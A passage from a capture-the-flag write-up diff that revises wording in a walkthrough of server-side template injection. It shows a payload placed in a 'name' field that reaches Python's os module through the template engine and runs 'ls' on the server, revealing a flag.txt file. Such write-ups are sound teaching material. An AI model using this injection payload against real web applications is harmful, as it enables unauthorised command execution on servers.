joelsiks/ctf_writeups/2021/0x41414141/maze.md

 var name = "333";
 ```

-Knowing the template engine, we can easily execute shell commands via the os module.
+Knowing the template engine, we can easily execute shell commands via pythons os module.

-Using `ls` we see that there is a file called `flag.txt` in the current directory.
+Using the shell command `ls` we see that there is a file called `flag.txt` in the current directory.
 ```
 name={{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}}